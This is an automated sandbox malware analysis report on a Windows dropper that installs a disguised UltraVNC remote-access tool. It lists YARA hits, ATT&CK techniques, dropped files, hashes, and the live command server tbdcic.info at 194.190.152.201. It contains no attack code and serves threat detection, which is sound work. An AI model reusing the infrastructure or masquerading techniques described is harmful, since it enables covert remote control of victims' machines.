                          Source: Yara matchFile source: 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Olz7TmvkEW.exe PID: 1240, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 2044, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 1840, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Windows\Tasks\GIjul8.QTIrrr, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
                          Contains VNC / remote desktop functionality (version string found)
                          Source: sync_browser.exe, 00000017.00000002.3170436732.0000000002B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                          Source: sync_browser.exe, 00000017.00000003.1611921485.0000000002B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire Infrastructure1
                          Valid Accounts                          		1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          Exploitation for Privilege Escalation                          		1
                          Disable or Modify Tools                          		121
                          Input Capture                          		2
                          System Time Discovery                          		1
                          Remote Desktop Protocol                          		1
                          Archive Collected Data                          		1
                          Ingress Tool Transfer                          		Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts2
                          Native API                          		1
                          Valid Accounts                          		1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory1
                          Account Discovery                          		Remote Desktop Protocol1
                          Screen Capture                          		12
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		11
                          Windows Service                          		1
                          Valid Accounts                          		2
                          Obfuscated Files or Information                          		Security Account Manager1
                          System Service Discovery                          		SMB/Windows Admin Shares121
                          Input Capture                          		1
                          Remote Access Software                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job                          		1
                          Scheduled Task/Job                          		11
                          Access Token Manipulation                          		1
                          Timestomp                          		NTDS4
                          File and Directory Discovery                          		Distributed Component Object Model3
                          Clipboard Data                          		1
                          Non-Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts1
                          Service Execution                          		1
                          Bootkit                          		11
                          Windows Service                          		1
                          DLL Side-Loading                          		LSA Secrets26
                          System Information Discovery                          		SSHKeylogging2
                          Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts22
                          Process Injection                          		231
                          Masquerading                          		Cached Domain Credentials31
                          Security Software Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                          Scheduled Task/Job                          		1
                          Valid Accounts                          		DCSync1
                          Virtualization/Sandbox Evasion                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Virtualization/Sandbox Evasion                          		Proc Filesystem3
                          Process Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Access Token Manipulation                          		/etc/passwd and /etc/shadow11
                          Application Window Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron22
                          Process Injection                          		Network Sniffing1
                          System Owner/User Discovery                          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                          Bootkit                          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579877 Sample: Olz7TmvkEW.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 84 52 x1.i.lencr.org 2->52 54 tbdcic.info 2->54 56 bg.microsoft.map.fastly.net 2->56 60 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->60 62 Yara detected UltraVNC Hacktool 2->62 64 AI detected suspicious sample 2->64 66 3 other signatures 2->66 10 Olz7TmvkEW.exe 8 2->10         started        signatures3 process4 file5 40 C:\Users\user\AppData\Local\...behaviorgraphIjul8.QTIrrr, PE32+ 10->40 dropped 42 C:\Users\user\AppData\Local\...\sdABZ4.E1924R, PE32+ 10->42 dropped 70 Contains functionality to register a low level keyboard hook 10->70 14 cmd.exe 3 6 10->14         started        18 cmd.exe 6 10->18         started        20 cmd.exe 2 10->20         started        signatures6 process7 file8 44 C:\Windows\Tasks\sync_browser.exe, PE32+ 14->44 dropped 46 C:\Windows\Tasks\conhost.exe, PE32+ 14->46 dropped 72 Drops executables to the windows directory (C:\Windows) and starts them 14->72 22 sync_browser.exe 14->22         started        26 Acrobat.exe 20 73 14->26         started        28 taskkill.exe 1 14->28         started        34 14 other processes 14->34 48 C:\Windows\TasksbehaviorgraphIjul8.QTIrrr, PE32+ 18->48 dropped 50 C:\Windows\Tasks\sdABZ4.E1924R, PE32+ 18->50 dropped 30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        signatures9 process10 dnsIp11 58 tbdcic.info 194.190.152.201, 443, 49762, 49764 RSHB-ASRU Russian Federation 22->58 68 Contains VNC / remote desktop functionality (version string found) 22->68 36 AcroCEF.exe 108 26->36         started        signatures12 process13 process14 38 AcroCEF.exe 4 36->38         started       

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          Olz7TmvkEW.exe3%ReversingLabs

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R0%ReversingLabs
                          C:\Windows\Tasks\GIjul8.QTIrrr0%ReversingLabs
                          C:\Windows\Tasks\conhost.exe0%ReversingLabs
                          C:\Windows\Tasks\sdABZ4.E1924R0%ReversingLabs
                          C:\Windows\Tasks\sync_browser.exe0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          No Antivirus matches

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          tbdcic.info
                          		194.190.152.201
                          		truefalse
                            		high
                            bg.microsoft.map.fastly.net
                            		199.232.214.172
                            		truefalse
                              		high
                              x1.i.lencr.org
                              		unknown
                              		unknownfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.uvnc.comOlz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500421713.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drfalse
                                  		high
                                  http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D.12.drfalse
                                    		high
                                    https://www.adobe.coReaderMessages.10.drfalse
                                      		high
                                      http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drfalse
                                        		high
                                        http://www.uvnc.comopenhttp://forum.uvnc.comnetOlz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drfalse
                                          		unknown
                                          http://crl.thawte.com/ThawteTimestampingCA.crl0Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drfalse
                                            		high
                                            http://java.sun.com/products/plugin/index.html#downloadOlz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drfalse
                                              		high
                                              http://forum.uvnc.comOlz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000017.00000000.1422003832.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000000.1496636673.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.1500264641.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drfalse
                                                		unknown
                                                http://ocsp.thawte.com0Olz7TmvkEW.exe, 00000000.00000003.1299009306.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Olz7TmvkEW.exe, 00000000.00000003.1299366156.0000000000639000.00000004.00001000.00020000.00000000.sdmp, GIjul8.QTIrrr.2.dr, sync_browser.exe.6.dr, GIjul8.QTIrrr.0.drfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  194.190.152.201
                                                  		tbdcic.infoRussian Federation
                                                  		41615RSHB-ASRUfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1579877
                                                  Start date and time:2024-12-23 13:36:33 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 7m 56s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Run name:Run with higher sleep bypass
                                                  Number of analysed new started processes analysed:37
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Olz7TmvkEW.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651.exe
                                                  Detection:MAL
                                                  Classification:mal84.troj.spyw.evad.winEXE@56/60@4/1
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 34.237.241.83, 18.213.11.84, 54.224.241.105, 50.16.47.176, 23.195.39.65, 2.19.198.27, 23.32.239.56, 184.30.20.134, 199.232.214.172, 13.107.246.63, 23.218.208.109, 4.245.163.56
                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: Olz7TmvkEW.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  No simulations

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  194.190.152.2017q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                    T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                      mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        tbdcic.info7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                        • 194.190.152.201
                                                        T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                        • 194.190.152.201
                                                        mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                        • 194.190.152.201
                                                        bg.microsoft.map.fastly.netq8b3OisMC4.dllGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                        • 199.232.210.172
                                                        T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                        • 199.232.210.172
                                                        mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                        • 199.232.214.172
                                                        eszstwQPwq.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                        • 199.232.210.172
                                                        0vM02qWRT9.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                        • 199.232.210.172
                                                        #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        fiFdIrd.txt.jsGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                        • 199.232.210.172

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        RSHB-ASRU7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                        • 194.190.152.201
                                                        T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                        • 194.190.152.201
                                                        mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                        • 194.190.152.201
                                                        Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                        • 194.190.152.129
                                                        Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                        • 194.190.152.129
                                                        document.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                        • 194.190.152.129
                                                        tiago.exeGet hashmaliciousReverse SSHBrowse
                                                        • 194.190.152.129
                                                        0EZ9Ho3Ruc.exeGet hashmaliciousRedLineBrowse
                                                        • 194.190.152.148
                                                        Paralysis Hack.exeGet hashmaliciouszgRATBrowse
                                                        • 194.190.153.137

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                          T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                            mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse
                                                              C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                                T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                  mSRW5AfJpC.exeGet hashmaliciousUltraVNCBrowse

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):300
                                                                    Entropy (8bit):5.223509277357721
                                                                    Encrypted:false
                                                                    SSDEEP:6:4gGHN+q2PcNwi2nKuAl9OmbnIFUt8d9ZZmw+d9NVkwOcNwi2nKuAl9OmbjLJ:4DovLZHAahFUt8dP/+dd54ZHAaSJ
                                                                    MD5:43AC002CEE10B8F6A540E68B6162B091
                                                                    SHA1:4E337DB1906A565620FFFFFE2E7B0DC50767C6B5
                                                                    SHA-256:203D85F211301464D4CF9EC41FF0EC9F4A2FC1E7051E649E3C896147CC8DA3F8
                                                                    SHA-512:1AC2837C551CBD881EF5827B3ED4395098345C2556B204F0D8571BBCE99C84BAD6756540A5BDDC51C20DE1BED83313C04DD35C349E58D9B3D3CDD4991DCDBC77
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.150 1cc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:37:37.152 1cc8 Recovering log #3.2024/12/23-07:37:37.152 1cc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):300
                                                                    Entropy (8bit):5.223509277357721
                                                                    Encrypted:false
                                                                    SSDEEP:6:4gGHN+q2PcNwi2nKuAl9OmbnIFUt8d9ZZmw+d9NVkwOcNwi2nKuAl9OmbjLJ:4DovLZHAahFUt8dP/+dd54ZHAaSJ
                                                                    MD5:43AC002CEE10B8F6A540E68B6162B091
                                                                    SHA1:4E337DB1906A565620FFFFFE2E7B0DC50767C6B5
                                                                    SHA-256:203D85F211301464D4CF9EC41FF0EC9F4A2FC1E7051E649E3C896147CC8DA3F8
                                                                    SHA-512:1AC2837C551CBD881EF5827B3ED4395098345C2556B204F0D8571BBCE99C84BAD6756540A5BDDC51C20DE1BED83313C04DD35C349E58D9B3D3CDD4991DCDBC77
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.150 1cc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:37:37.152 1cc8 Recovering log #3.2024/12/23-07:37:37.152 1cc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):344
                                                                    Entropy (8bit):5.162535692089053
                                                                    Encrypted:false
                                                                    SSDEEP:6:uq2PcNwi2nKuAl9Ombzo2jMGIFUt8xXZmw+wtkwOcNwi2nKuAl9Ombzo2jMmLJ:uvLZHAa8uFUt8d/+wt54ZHAa8RJ
                                                                    MD5:60D47923D892872098BE9135B8B4AD4B
                                                                    SHA1:E4836F1E63364DC29FE14DF6334534559C7E73A5
                                                                    SHA-256:C9D9878F634E13187117BAC449431BED703986998205443D3A94512AEDEDC3FD
                                                                    SHA-512:1316EFA7B625CBE975A489D0C46D95234D0DCE20B4BD5653F36D1CF68B99F250016996FC4EAFCCD8D759598CB5D0BB57CD36683591DE474F8AEAA83DBDD4C592
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.241 1df0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:37:37.242 1df0 Recovering log #3.2024/12/23-07:37:37.243 1df0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):344
                                                                    Entropy (8bit):5.162535692089053
                                                                    Encrypted:false
                                                                    SSDEEP:6:uq2PcNwi2nKuAl9Ombzo2jMGIFUt8xXZmw+wtkwOcNwi2nKuAl9Ombzo2jMmLJ:uvLZHAa8uFUt8d/+wt54ZHAa8RJ
                                                                    MD5:60D47923D892872098BE9135B8B4AD4B
                                                                    SHA1:E4836F1E63364DC29FE14DF6334534559C7E73A5
                                                                    SHA-256:C9D9878F634E13187117BAC449431BED703986998205443D3A94512AEDEDC3FD
                                                                    SHA-512:1316EFA7B625CBE975A489D0C46D95234D0DCE20B4BD5653F36D1CF68B99F250016996FC4EAFCCD8D759598CB5D0BB57CD36683591DE474F8AEAA83DBDD4C592
                                                                    Malicious:false
                                                                    Preview:2024/12/23-07:37:37.241 1df0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:37:37.242 1df0 Recovering log #3.2024/12/23-07:37:37.243 1df0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):475
                                                                    Entropy (8bit):4.967403857886107
                                                                    Encrypted:false
                                                                    SSDEEP:12:YH/um3RA8sq71jEhsBdOg2H9CTTfcaq3QYiubSpDyP7E4TX:Y2sRdsqvdMH4u3QYhbSpDa7n7
                                                                    MD5:094BB3083CDB1DAC0A08BF9F0EB28C14
                                                                    SHA1:FE55EC77FC56E177E62CCE9C553182AA8399C45B
                                                                    SHA-256:0022675C014614DA106CE184F84EEE384C39F3A7BA3D2CAF4F621490B4B80652
                                                                    SHA-512:16A27F1722CB2359F9756145549F181A8C18FADFF1927AC85D2DF008AF0272A928C01E89BC6125323F4E62ECB16EB4865FA63E9A8626EE2A6F321996DA887AF0
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379517466892184","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":635266},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f37ef1f9-647d-4b6b-a142-49b04b2a47d1.tmp

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:JSON data
                                                                    Category:modified
                                                                    Size (bytes):475
                                                                    Entropy (8bit):4.967403857886107
                                                                    Encrypted:false
                                                                    SSDEEP:12:YH/um3RA8sq71jEhsBdOg2H9CTTfcaq3QYiubSpDyP7E4TX:Y2sRdsqvdMH4u3QYhbSpDa7n7
                                                                    MD5:094BB3083CDB1DAC0A08BF9F0EB28C14
                                                                    SHA1:FE55EC77FC56E177E62CCE9C553182AA8399C45B
                                                                    SHA-256:0022675C014614DA106CE184F84EEE384C39F3A7BA3D2CAF4F621490B4B80652
                                                                    SHA-512:16A27F1722CB2359F9756145549F181A8C18FADFF1927AC85D2DF008AF0272A928C01E89BC6125323F4E62ECB16EB4865FA63E9A8626EE2A6F321996DA887AF0
                                                                    Malicious:false
                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379517466892184","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":635266},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                    Download File
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):4099
                                                                    Entropy (8bit):5.23628300409856
                                                                    Encrypted:false
                                                                    SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPh3y33hc:CwNw1GHqPySfkcigoO3h28ytPh3y3Rc
                                                                    MD5:BF006230DED78736DA53AE00B6B115BB
                                                                    SHA1:6F141BF859F20081E58C20B690E895282D058614
                                                                    SHA-256:9B46592FDAE6C2BBDADD98A34CC2997B0E400EC5FA7FEA33255156696D588B92
